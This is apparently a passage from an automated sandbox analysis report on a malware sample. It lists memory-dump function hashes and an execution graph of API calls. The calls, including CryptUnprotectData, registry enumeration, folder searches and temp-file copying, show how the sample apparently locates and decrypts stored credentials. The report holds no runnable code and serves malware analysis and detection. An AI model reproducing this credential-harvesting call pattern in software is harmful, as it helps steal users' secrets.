                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.419686380.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_390000_gwseuha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f70a115037b3a86f72fa1bfd4cb7929bcce809e9eccfaef2191db6ae3ccf9e63
                                                      • Instruction ID: 2b896c141344fdcd7707bd1b7db8dba4c50754a8640bc07c11f8e054b386b3ee
                                                      • Opcode Fuzzy Hash: f70a115037b3a86f72fa1bfd4cb7929bcce809e9eccfaef2191db6ae3ccf9e63
                                                      • Instruction Fuzzy Hash: 6B817E70A0064ADFCB15DFA4C880AAEB7F2FF88300F258669D555AB395D731ED46CB90
                                                      Function 00391498 Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.419686380.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_390000_gwseuha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fff3cec5c8b0362f17b5d2f003bea61496399975f7510d077bdf48792b6249ee
                                                      • Instruction ID: f8ec019877d008540400efd4bf8b19a6f283265f23291964960628d7bbaab946
                                                      • Opcode Fuzzy Hash: fff3cec5c8b0362f17b5d2f003bea61496399975f7510d077bdf48792b6249ee
                                                      • Instruction Fuzzy Hash: 4C11C431B10204AFC715ABB9E81479D7BB6EF89700F1580BAE609DB395DB749D02CB91
                                                      Function 00391348 Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.419686380.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_390000_gwseuha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d70f3e690ece4785d4b5ee74df3020a530a2dbfc9c31f15d086522b7f9e0b3e3
                                                      • Instruction ID: cca7de90434a645e359986cd40b7d0ccfcc41941a28a8c7c8364efba7974a19f
                                                      • Opcode Fuzzy Hash: d70f3e690ece4785d4b5ee74df3020a530a2dbfc9c31f15d086522b7f9e0b3e3
                                                      • Instruction Fuzzy Hash: AD012B7B710611DFCB26AB25EC84D2B3BF4EBC9B503028518EC429B719DA74DC01C7A0
                                                      Function 00391421 Relevance: .0, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.419686380.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_390000_gwseuha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9bdd1bebd39cb0dbd0392c18f4a152784fb1c98417bf9b6d52d94d83b6167117
                                                      • Instruction ID: 543dcfab2a552c6fcf44c61e7848c33f0b5ed4afc16a1ac6e4ff76c9136de3f7
                                                      • Opcode Fuzzy Hash: 9bdd1bebd39cb0dbd0392c18f4a152784fb1c98417bf9b6d52d94d83b6167117
                                                      • Instruction Fuzzy Hash: 8BF052727053202FD30917786C10AAF3BBEEFCA22031805BAE409CB342ED748C0683E0
                                                      Function 00390857 Relevance: .0, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.419686380.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_390000_gwseuha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 478a8bd76b7f6ec3d175d683f57bd366430e732a0ad4099c3e388fbc8423359b
                                                      • Instruction ID: 476ad30b240ad5d9bdbbcc747a13f549afe5d36a114d43719d45744bd8496f8f
                                                      • Opcode Fuzzy Hash: 478a8bd76b7f6ec3d175d683f57bd366430e732a0ad4099c3e388fbc8423359b
                                                      • Instruction Fuzzy Hash: 78F0E53160C289AFC706CFB59C484DA7FF9EF0661070580EFE448C3112E6705C048761
                                                      Function 00390868 Relevance: .0, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.419686380.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_390000_gwseuha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1767142fbbb1894315af9c54233d9df70006003800629abef5c2345af41ae78b
                                                      • Instruction ID: d28cd6b0f371b85e26c286f310e1bcbc017d856e9e7126aa01cf0c030a060eb2
                                                      • Opcode Fuzzy Hash: 1767142fbbb1894315af9c54233d9df70006003800629abef5c2345af41ae78b
                                                      • Instruction Fuzzy Hash: DBE09232B04109AF9B08EFF9F9484DE7FEDFB48722B00C07AE009D3610EA7458808790
                                                      Function 003913E0 Relevance: .0, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.419686380.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_390000_gwseuha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 28a0b0e71895c7a187a6778f85b3e5dcdd639e8bd8d3163193a5f63333206200
                                                      • Instruction ID: 47f3745736c951596695a43dd6685011cc7f4d0c00b396bc6f47e970477a4514
                                                      • Opcode Fuzzy Hash: 28a0b0e71895c7a187a6778f85b3e5dcdd639e8bd8d3163193a5f63333206200
                                                      • Instruction Fuzzy Hash: BCE0C234118380CFDB0AAF35FA28AE53FF5AB4A304B4580E9E8818B667D6785C80CB55
                                                      Function 00391489 Relevance: .0, Instructions: 16COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.419686380.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_390000_gwseuha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9f75dd602ac67d610a08db3a1f0f7510e1e66880032a9d66fde53dc58cf9e3d5
                                                      • Instruction ID: a32dc82c42da3f11fca8f9969e510747966fc7f1eaa2e0361d727a614880dc22
                                                      • Opcode Fuzzy Hash: 9f75dd602ac67d610a08db3a1f0f7510e1e66880032a9d66fde53dc58cf9e3d5
                                                      • Instruction Fuzzy Hash: 7DD0A732B49A55ABCB0A52B5AD092CC3F348B46250B8940BBD544D7192F604891483D2
                                                      Function 00391590 Relevance: .0, Instructions: 9COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.419686380.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_390000_gwseuha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 919b6136d14028392384b75bb960da8b63eddf52f06f8e1c712960827e400835
                                                      • Instruction ID: fc13aea607f6517d3ae1ad7a5fe43cd5aab78ead9810f44acc401bddb88b87c8
                                                      • Opcode Fuzzy Hash: 919b6136d14028392384b75bb960da8b63eddf52f06f8e1c712960827e400835
                                                      • Instruction Fuzzy Hash: B7C012A84492C11EEB171730A8283A03F711B87204F8B50CAC0C1678B3E4980864C326

                                                      Execution Graph

                                                      Execution Coverage:2.5%
                                                      Dynamic/Decrypted Code Coverage:53.7%
                                                      Signature Coverage:16.3%
                                                      Total number of Nodes:583
                                                      Total number of Limit Nodes:29
                                                      execution_graph 27727 ca40e 27732 ca426 27727->27732 27736 ca4a2 27727->27736 27728 ca4cc ReadFile 27730 ca524 27728->27730 27728->27736 27729 ca469 memcpy 27729->27736 27741 ca2aa 17 API calls 27730->27741 27731 ca44a memcpy 27739 ca45d 27731->27739 27732->27729 27732->27731 27732->27736 27734 ca532 27735 ca53e memset 27734->27735 27734->27739 27735->27739 27736->27728 27736->27730 27737 ca501 27736->27737 27740 ca1c6 18 API calls 27737->27740 27740->27739 27741->27734 28437 e0e0c 22 API calls 27956 c4406 27961 c2e30 StrStrIW 27956->27961 27959 c2e30 22 API calls 27960 c443a 27959->27960 27962 c2ebc 27961->27962 27963 c2e57 27961->27963 27987 c1000 GetProcessHeap RtlAllocateHeap 27962->27987 27965 c19e5 9 API calls 27963->27965 27966 c2e68 27965->27966 27966->27962 27988 c1bc5 10 API calls 27966->27988 27967 c2ed0 RegOpenKeyExW 27968 c2f68 27967->27968 27978 c2eee 27967->27978 27969 c1011 3 API calls 27968->27969 27972 c2f6f 27969->27972 27971 c2f50 RegEnumKeyExW 27974 c2f5e RegCloseKey 27971->27974 27971->27978 27972->27959 27973 c2e75 27975 c2eb5 27973->27975 27977 c1afe 10 API calls 27973->27977 27974->27968 27979 c1011 3 API calls 27975->27979 27976 c1953 6 API calls 27976->27978 27980 c2e83 27977->27980 27978->27971 27978->27976 27981 c199d 9 API calls 27978->27981 27983 c2e30 18 API calls 27978->27983 27986 c1011 3 API calls 27978->27986 27979->27962 27982 c199d 9 API calls 27980->27982 27985 c2e91 27980->27985 27981->27978 27982->27985 27983->27978 27984 c1011 3 API calls 27984->27975 27985->27984 27986->27978 27987->27967 27988->27973 28439 cca01 _allmul _alldiv _allmul _alldiv 28331 f9000 28 API calls 28333 105401 memset memcpy memcpy memset memcpy 28441 ef21c 23 API calls 28334 c581f _alldiv _allrem _allmul 28336 e742e 24 API calls 28338 e7c28 8 API calls 28340 c482b 14 API calls 28341 fe024 83 API calls 28343 d943d 34 API calls 28346 107452 19 API calls 28448 e13ca 92 API calls 27994 c3c40 27995 c1b6a 2 API calls 27994->27995 27996 c3c50 27995->27996 27997 c3dfa 27996->27997 28030 c1000 GetProcessHeap RtlAllocateHeap 27996->28030 27999 c3c62 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28031 114bec 27999->28031 28001 c3dec DeleteFileW 28002 c1011 3 API calls 28001->28002 28002->27997 28003 c3c9a 28003->28001 28004 c3de3 28003->28004 28042 c1000 GetProcessHeap RtlAllocateHeap 28003->28042 28050 113848 66 API calls 28004->28050 28007 c3cce 28043 e02ec 84 API calls 28007->28043 28009 c3da8 28046 dfb92 83 API calls 28009->28046 28011 c3db1 lstrlen 28012 c3ddc 28011->28012 28013 c3db9 28011->28013 28014 c1011 3 API calls 28012->28014 28047 c1798 lstrlen 28013->28047 28014->28004 28015 c1fa7 19 API calls 28023 c3cd9 28015->28023 28017 c3dc8 28048 c1798 lstrlen 28017->28048 28018 c3d2b lstrlen 28020 c3d35 lstrlen 28018->28020 28018->28023 28020->28023 28021 c3dd2 28049 c1798 lstrlen 28021->28049 28023->28009 28023->28015 28023->28018 28044 c1000 GetProcessHeap RtlAllocateHeap 28023->28044 28045 e02ec 84 API calls 28023->28045 28026 c3d46 wsprintfA lstrlen 28027 c3d71 28026->28027 28028 c3d83 lstrcat 28026->28028 28027->28028 28029 c1011 3 API calls 28028->28029 28029->28023 28030->27999 28051 11307c 28031->28051 28033 114c01 28040 114c44 28033->28040 28061 dc54d memset 28033->28061 28035 114c18 28062 dc871 21 API calls 28035->28062 28037 114c2a 28063 dc518 19 API calls 28037->28063 28039 114c33 28039->28040 28064 11486f 79 API calls 28039->28064 28040->28003 28042->28007 28043->28023 28044->28026 28045->28023 28046->28011 28047->28017 28048->28021 28049->28012 28050->28001 28052 113095 28051->28052 28060 11308e 28051->28060 28053 1130ad 28052->28053 28078 c66ce 17 API calls 28052->28078 28055 1130ed memset 28053->28055 28053->28060 28056 113108 28055->28056 28057 113116 28056->28057 28079 cc59d 17 API calls 28056->28079 28057->28060 28065 c6512 28057->28065 28060->28033 28061->28035 28062->28037 28063->28039 28064->28040 28080 c685c 28065->28080 28067 c651d 28067->28060 28068 c6519 28068->28067 28069 cbfec GetSystemInfo 28068->28069 28083 c65bd 28069->28083 28071 cc00e 28072 c65bd 16 API calls 28071->28072 28073 cc01a 28072->28073 28074 c65bd 16 API calls 28073->28074 28075 cc026 28074->28075 28076 c65bd 16 API calls 28075->28076 28077 cc032 28076->28077 28077->28060 28078->28053 28079->28057 28081 11307c 17 API calls 28080->28081 28082 c6861 28081->28082 28082->28068 28084 11307c 17 API calls 28083->28084 28085 c65c2 28084->28085 28085->28071 28348 c4440 24 API calls 28349 e6440 84 API calls 28086 c105d VirtualFree 28452 129238 LoadLibraryA GetProcAddress VirtualProtect VirtualProtect 28453 c5e5a 28 API calls 28351 c4c6d 17 API calls 28455 f3e6b 20 API calls 28353 df86a 31 API calls 28354 11507d 24 API calls 28356 d807c 23 API calls 28358 102864 25 API calls 28459 e0670 _allmul _allmul _allmul _alldvrm 28462 d0284 26 API calls 28364 102c9e 95 API calls 28465 e069d _allmul 28164 c3098 28165 c1b6a 2 API calls 28164->28165 28166 c30af 28165->28166 28172 c33a9 28166->28172 28188 c1000 GetProcessHeap RtlAllocateHeap 28166->28188 28168 c30ed GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28169 114bec 79 API calls 28168->28169 28173 c3126 28169->28173 28170 c339b DeleteFileW 28171 c1011 3 API calls 28170->28171 28171->28172 28173->28170 28174 c3392 28173->28174 28189 e02ec 84 API calls 28173->28189 28193 113848 66 API calls 28174->28193 28177 c3381 28192 dfb92 83 API calls 28177->28192 28179 c319c RtlCompareMemory 28180 c32cd CryptUnprotectData 28179->28180 28187 c3155 28179->28187 28180->28187 28182 c31d0 RtlZeroMemory 28190 c1000 GetProcessHeap RtlAllocateHeap 28182->28190 28184 c1011 3 API calls 28184->28187 28185 c1fa7 19 API calls 28185->28187 28186 c1798 lstrlen 28186->28187 28187->28177 28187->28179 28187->28180 28187->28182 28187->28184 28187->28185 28187->28186 28191 e02ec 84 API calls 28187->28191 28188->28168 28189->28187 28190->28187 28191->28187 28192->28174 28193->28170 28466 d6698 30 API calls 28467 c629a 23 API calls 28370 10348f 27 API calls 28372 db0aa 74 API calls 27935 c24a4 27938 c2198 RtlZeroMemory GetVersionExW 27935->27938 27939 c21cb LoadLibraryW 27938->27939 27941 c21fc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27939->27941 27942 c249b 27939->27942 27943 c2492 FreeLibrary 27941->27943 27951 c2244 27941->27951 27943->27942 27944 c247b 27944->27943 27945 c2365 RtlCompareMemory 27945->27951 27946 c22e1 RtlCompareMemory 27946->27951 27947 c1953 6 API calls 27947->27951 27948 c1011 GetProcessHeap HeapFree VirtualQuery 27948->27951 27949 c23f8 StrStrIW 27949->27951 27950 c17c0 9 API calls 27950->27951 27951->27943 27951->27944 27951->27945 27951->27946 27951->27947 27951->27948 27951->27949 27951->27950 27955 c2ea5 25 API calls 27989 c9ea7 RtlAllocateHeap 27990 c9ed9 27989->27990 27991 c9ec1 27989->27991 27993 c7f70 17 API calls 27991->27993 27993->27990 28373 db8a6 80 API calls 28471 c56a2 _allrem 28472 c96bc _alldiv _alldiv _alldiv _alldiv _allmul 28374 d78b9 33 API calls 28474 e12bb _allmul _allmul _allmul _alldvrm _allmul 28375 e13ca 77 API calls 28476 e13ca 79 API calls 28376 c2cb5 16 API calls 28377 c6eb7 24 API calls 28378 c48b1 22 API calls 28478 efaca _allmul strcspn 28380 c6eb7 22 API calls 28381 d5cca 32 API calls 28382 c5cc5 22 API calls 28383 f70de 24 API calls 28483 ec6da 23 API calls 28387 1134ca 47 API calls 28390 cf4ec 20 API calls 27922 c9ee8 27923 c9ef1 HeapFree 27922->27923 27926 c9f1a 27922->27926 27924 c9f02 27923->27924 27923->27926 27927 c7f70 17 API calls 27924->27927 27927->27926 28392 c28f8 100 API calls 28487 e13ca 78 API calls 28393 c4cf5 memset 28488 f9ef6 104 API calls 28394 e13ca 79 API calls 27742 c4108 27745 c4045 27742->27745 27764 c3fdc 27745->27764 27748 c3fdc 50 API calls 27749 c407a 27748->27749 27750 c3fdc 50 API calls 27749->27750 27751 c408d 27750->27751 27752 c3fdc 50 API calls 27751->27752 27753 c40a0 27752->27753 27754 c3fdc 50 API calls 27753->27754 27755 c40b3 27754->27755 27756 c3fdc 50 API calls 27755->27756 27757 c40c6 27756->27757 27758 c3fdc 50 API calls 27757->27758 27759 c40d9 27758->27759 27760 c3fdc 50 API calls 27759->27760 27761 c40ec 27760->27761 27762 c3fdc 50 API calls 27761->27762 27763 c40ff 27762->27763 27775 c1afe 27764->27775 27767 c403f 27767->27748 27771 c4038 27838 c1011 27771->27838 27843 c1000 GetProcessHeap RtlAllocateHeap 27775->27843 27777 c1b0d SHGetFolderPathW 27778 c1b63 27777->27778 27779 c1b20 27777->27779 27778->27767 27783 c199d 27778->27783 27780 c1011 3 API calls 27779->27780 27782 c1b28 27780->27782 27782->27778 27844 c19e5 27782->27844 27859 c1953 27783->27859 27785 c19a6 27786 c1011 3 API calls 27785->27786 27787 c19af 27786->27787 27788 c3ed9 27787->27788 27789 c3eed 27788->27789 27790 c3fd1 27788->27790 27789->27790 27865 c1000 GetProcessHeap RtlAllocateHeap 27789->27865 27790->27771 27810 c1d4a 27790->27810 27792 c3f01 PathCombineW FindFirstFileW 27793 c3fca 27792->27793 27794 c3f27 27792->27794 27797 c1011 3 API calls 27793->27797 27795 c3f78 lstrcmpiW 27794->27795 27796 c3f32 lstrcmpiW 27794->27796 27866 c1000 GetProcessHeap RtlAllocateHeap 27794->27866 27795->27794 27798 c3faf FindNextFileW 27795->27798 27796->27798 27799 c3f42 lstrcmpiW 27796->27799 27797->27790 27798->27794 27801 c3fc3 FindClose 27798->27801 27799->27798 27802 c3f56 27799->27802 27801->27793 27883 c1000 GetProcessHeap RtlAllocateHeap 27802->27883 27803 c3f92 PathCombineW 27867 c3e04 27803->27867 27806 c3f60 PathCombineW 27808 c3ed9 23 API calls 27806->27808 27807 c3f76 27809 c1011 3 API calls 27807->27809 27808->27807 27809->27798 27811 c1eb4 27810->27811 27812 c1d62 27810->27812 27811->27771 27812->27811 27915 c19b4 27812->27915 27815 c1d79 27817 c1953 6 API calls 27815->27817 27816 c1d8b 27818 c1953 6 API calls 27816->27818 27819 c1d83 27817->27819 27818->27819 27819->27811 27820 c1da3 FindFirstFileW 27819->27820 27821 c1ead 27820->27821 27828 c1dba 27820->27828 27822 c1011 3 API calls 27821->27822 27822->27811 27823 c1dc5 lstrcmpiW 27825 c1ddd lstrcmpiW 27823->27825 27826 c1e8e FindNextFileW 27823->27826 27824 c1953 6 API calls 27824->27828 27825->27826 27835 c1df5 27825->27835 27827 c1ea2 FindClose 27826->27827 27826->27828 27827->27821 27828->27823 27828->27824 27829 c199d 9 API calls 27828->27829 27831 c1e54 lstrcmpiW 27829->27831 27830 c19b4 lstrlenW 27830->27835 27831->27835 27833 c1011 3 API calls 27833->27826 27834 c1953 6 API calls 27834->27835 27835->27830 27835->27833 27835->27834 27836 c199d 9 API calls 27835->27836 27837 c1d4a 12 API calls 27835->27837 27919 c1cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 27835->27919 27836->27835 27837->27835 27920 c1162 VirtualQuery 27838->27920 27841 c102d 27841->27767 27842 c101d GetProcessHeap HeapFree 27842->27841 27843->27777 27845 c19fa RegOpenKeyExW 27844->27845 27846 c19f7 27844->27846 27847 c1a28 RegQueryValueExW 27845->27847 27848 c1aa2 27845->27848 27846->27845 27850 c1a94 RegCloseKey 27847->27850 27851 c1a46 27847->27851 27849 c1ab9 27848->27849 27852 c19e5 5 API calls 27848->27852 27849->27782 27850->27848 27850->27849 27851->27850 27858 c1000 GetProcessHeap RtlAllocateHeap 27851->27858 27852->27849 27854 c1a61 RegQueryValueExW 27855 c1a7f 27854->27855 27856 c1a8b 27854->27856 27855->27850 27857 c1011 3 API calls 27856->27857 27857->27855 27858->27854 27860 c1964 lstrlenW lstrlenW 27859->27860 27864 c1000 GetProcessHeap RtlAllocateHeap 27860->27864 27863 c1986 lstrcatW lstrcatW 27863->27785 27864->27863 27865->27792 27866->27803 27884 c1b6a 27867->27884 27869 c3e0f 27874 c3ec7 27869->27874 27890 c1c31 CreateFileW 27869->27890 27874->27807 27877 c3ebf 27878 c1011 3 API calls 27877->27878 27878->27874 27879 c3e6c RtlCompareMemory 27880 c3ea8 27879->27880 27881 c3e7e CryptUnprotectData 27879->27881 27882 c1011 3 API calls 27880->27882 27881->27880 27882->27877 27883->27806 27885 c1b6f 27884->27885 27886 c1b99 27884->27886 27885->27886 27887 c1b76 CreateFileW 27885->27887 27886->27869 27888 c1b8d CloseHandle 27887->27888 27889 c1b95 27887->27889 27888->27889 27889->27869 27891 c1c98 27890->27891 27892 c1c53 GetFileSize 27890->27892 27891->27874 27900 c2fb1 27891->27900 27893 c1c90 CloseHandle 27892->27893 27894 c1c63 27892->27894 27893->27891 27912 c1000 GetProcessHeap RtlAllocateHeap 27894->27912 27896 c1c6b ReadFile 27897 c1c80 27896->27897 27897->27893 27898 c1011 3 API calls 27897->27898 27899 c1c8e 27898->27899 27899->27893 27901 c2fb8 StrStrIA 27900->27901 27903 c2ff2 27900->27903 27902 c2fcd lstrlen StrStrIA 27901->27902 27901->27903 27902->27903 27904 c2fe7 27902->27904 27903->27874 27906 c123b lstrlen 27903->27906 27913 c190b 6 API calls 27904->27913 27907 c129b 27906->27907 27908 c1256 CryptStringToBinaryA 27906->27908 27907->27877 27907->27879 27907->27880 27908->27907 27909 c1272 27908->27909 27914 c1000 GetProcessHeap RtlAllocateHeap 27909->27914 27911 c127e CryptStringToBinaryA 27911->27907 27912->27896 27913->27903 27914->27911 27916 c19bc 27915->27916 27918 c19d4 27915->27918 27917 c19c3 lstrlenW 27916->27917 27916->27918 27917->27918 27918->27815 27918->27816 27919->27835 27921 c1019 27920->27921 27921->27841 27921->27842 28490 e5f08 92 API calls 28396 114116 30 API calls 28492 f6f06 24 API calls 28397 d84a7 30 API calls 28224 129304 28226 129344 28224->28226 28225 129584 28225->28225 28226->28225 28227 1294da LoadLibraryA 28226->28227 28231 12951f VirtualProtect VirtualProtect 28226->28231 28228 1294f1 28227->28228 28228->28226 28230 129503 GetProcAddress 28228->28230 28230->28228 28232 129519 28230->28232 28231->28225 28249 c411b 28250 c4045 50 API calls 28249->28250 28251 c412b 28250->28251 28252 c4045 50 API calls 28251->28252 28253 c413b 28252->28253 28496 c2b15 50 API calls 28497 e6b14 memset memcpy _allmul 28257 c3717 28258 c1b6a 2 API calls 28257->28258 28259 c372e 28258->28259 28260 c3c23 28259->28260 28307 c1000 GetProcessHeap RtlAllocateHeap 28259->28307 28262 c376c GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28263 c379e 28262->28263 28264 c37a8 28262->28264 28308 c349b 31 API calls 28263->28308 28266 114bec 79 API calls 28264->28266 28269 c37b3 28266->28269 28267 c3c15 DeleteFileW 28268 c1011 3 API calls 28267->28268 28268->28260 28269->28267 28270 c3c0c 28269->28270 28309 c1000 GetProcessHeap RtlAllocateHeap 28269->28309 28319 113848 66 API calls 28270->28319 28273 c37e3 28310 e02ec 84 API calls 28273->28310 28275 c3bcc 28315 dfb92 83 API calls 28275->28315 28277 c3bd9 lstrlen 28279 c3c05 28277->28279 28280 c3be5 28277->28280 28278 c1fa7 19 API calls 28301 c37ee 28278->28301 28282 c1011 3 API calls 28279->28282 28316 c1798 lstrlen 28280->28316 28282->28270 28284 c3bf3 28317 c1798 lstrlen 28284->28317 28285 c3a37 CryptUnprotectData 28285->28301 28286 c3833 RtlCompareMemory 28286->28285 28286->28301 28288 c3bfc 28318 c1798 lstrlen 28288->28318 28290 c3867 RtlZeroMemory 28311 c1000 GetProcessHeap RtlAllocateHeap 28290->28311 28292 c1011 3 API calls 28292->28301 28293 c3b0f lstrlen 28294 c3b21 lstrlen 28293->28294 28293->28301 28294->28301 28295 c1000 GetProcessHeap RtlAllocateHeap 28295->28301 28296 c3987 lstrlen 28299 c3999 lstrlen 28296->28299 28296->28301 28298 c3b66 wsprintfA lstrlen 28300 c3ba3 lstrcat 28298->28300 28298->28301 28299->28301 28300->28301 28301->28275 28301->28278 28301->28285 28301->28286 28301->28290 28301->28292 28301->28293 28301->28295 28301->28296 28301->28300 28312 c2112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 28301->28312 28313 c2112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 28301->28313 28314 e02ec 84 API calls 28301->28314 28303 c39de wsprintfA lstrlen 28304 c3a1b lstrcat 28303->28304 28305 c3a0d 28303->28305 28306 c1011 3 API calls 28304->28306 28305->28304 28306->28301 28307->28262 28308->28264 28309->28273 28310->28301 28311->28301 28312->28303 28313->28298 28314->28301 28315->28277 28316->28284 28317->28288 28318->28279 28319->28267 28498 f072d 19 API calls 28399 d0128 23 API calls 28499 ccb2a _allmul _allmul 28401 c9925 18 API calls 28502 d7b3d 18 API calls 28161 c413e 28162 c4045 50 API calls 28161->28162 28163 c414e 28162->28163 28503 10c322 27 API calls 28505 d0f3e 50 API calls 28404 d9534 39 API calls 28405 ef130 22 API calls 28508 dff32 21 API calls 28509 df74d 18 API calls 28510 e6340 82 API calls 28407 ee141 18 API calls 28408 ca558 18 API calls 28409 ee558 22 API calls 28410 f5d6f 20 API calls 28411 da16f 33 API calls 28514 cab68 20 API calls 28516 e7f67 24 API calls 28518 f7762 memset memset memcpy 28413 dc97b memcpy 28320 c2f77 28321 c2e30 22 API calls 28320->28321 28322 c2f9a 28321->28322 28323 c2e30 22 API calls 28322->28323 28324 c2fab 28323->28324 28416 e7d8b _allrem memcpy 28519 dab8b 19 API calls 28522 c1b9d GetFileAttributesW 28417 c1198 GetProcessHeap RtlAllocateHeap CryptBinaryToStringA CryptBinaryToStringA 28523 cbf9a _alldiv 28418 dfd97 19 API calls 28524 e13ca 78 API calls 28526 dcb91 18 API calls 28528 1033b7 27 API calls 28529 e8ba6 7 API calls 28421 d11a0 33 API calls 28422 e9dbc 25 API calls 28530 e13ca 79 API calls 28531 1053ad memset memcpy memset memcpy 27928 c9fc8 27929 c9fd3 27928->27929 27931 c9fd8 27928->27931 27930 c9ff4 HeapCreate 27930->27929 27932 ca004 27930->27932 27931->27929 27931->27930 27934 c7f70 17 API calls 27932->27934 27934->27929 28535 e13ca 79 API calls 28536 f73c4 22 API calls 28087 c15dd 28088 c1600 28087->28088 28089 c15f3 lstrlen 28087->28089 28098 c1000 GetProcessHeap RtlAllocateHeap 28088->28098 28089->28088 28091 c1608 lstrcat 28092 c163d lstrcat 28091->28092 28093 c1644 28091->28093 28092->28093 28099 c1333 28093->28099 28096 c1011 3 API calls 28097 c1667 28096->28097 28098->28091 28122 c1000 GetProcessHeap RtlAllocateHeap 28099->28122 28101 c1357 28123 c106c lstrlen MultiByteToWideChar 28101->28123 28103 c1366 28124 c12a3 RtlZeroMemory 28103->28124 28106 c13b8 RtlZeroMemory 28110 c13ed 28106->28110 28107 c1011 3 API calls 28108 c15d2 28107->28108 28108->28096 28109 c15b5 28109->28107 28110->28109 28126 c1000 GetProcessHeap RtlAllocateHeap 28110->28126 28112 c14a7 wsprintfW 28113 c14c9 28112->28113 28121 c15a1 28113->28121 28127 c1000 GetProcessHeap RtlAllocateHeap 28113->28127 28114 c1011 3 API calls 28114->28109 28116 c159a 28119 c1011 3 API calls 28116->28119 28117 c1533 28117->28116 28128 c104c VirtualAlloc 28117->28128 28119->28121 28120 c158a RtlMoveMemory 28120->28116 28121->28114 28122->28101 28123->28103 28125 c12c5 28124->28125 28125->28106 28125->28109 28126->28112 28127->28117 28128->28120 28129 c63dd 28132 cb87b 28129->28132 28130 c63f4 28133 cb88d memset 28132->28133 28136 cb8e5 28133->28136 28136->28133 28137 cba3c 28136->28137 28138 cb965 CreateFileW 28136->28138 28141 cba14 28136->28141 28142 cba41 28136->28142 28147 cb609 28136->28147 28150 cb64b 18 API calls 28136->28150 28151 cbb9f 18 API calls 28136->28151 28152 ca2aa 17 API calls 28136->28152 28137->28130 28138->28136 28153 ca1c6 18 API calls 28141->28153 28155 1152ae _allmul 28142->28155 28144 cba32 28154 114db2 17 API calls 28144->28154 28156 ca08a 28147->28156 28149 cb60f 28149->28136 28150->28136 28151->28136 28152->28136 28153->28144 28154->28137 28155->28137 28157 ca0a4 28156->28157 28159 ca0aa 28157->28159 28160 c6a81 memset 28157->28160 28159->28149 28160->28159 28194 c43d9 28201 c4317 _alloca_probe RegOpenKeyW 28194->28201 28197 c4317 25 API calls 28198 c43f5 28197->28198 28199 c4317 25 API calls 28198->28199 28200 c4403 28199->28200 28202 c43cf 28201->28202 28203 c4343 RegEnumKeyExW 28201->28203 28202->28197 28204 c436d 28203->28204 28205 c43c4 RegCloseKey 28203->28205 28206 c1953 6 API calls 28204->28206 28207 c199d 9 API calls 28204->28207 28209 c1011 3 API calls 28204->28209 28212 c418a 28204->28212 28205->28202 28206->28204 28207->28204 28210 c439b RegEnumKeyExW 28209->28210 28210->28204 28211 c43c3 28210->28211 28211->28205 28213 c430d 28212->28213 28220 c41a3 28212->28220 28213->28204 28214 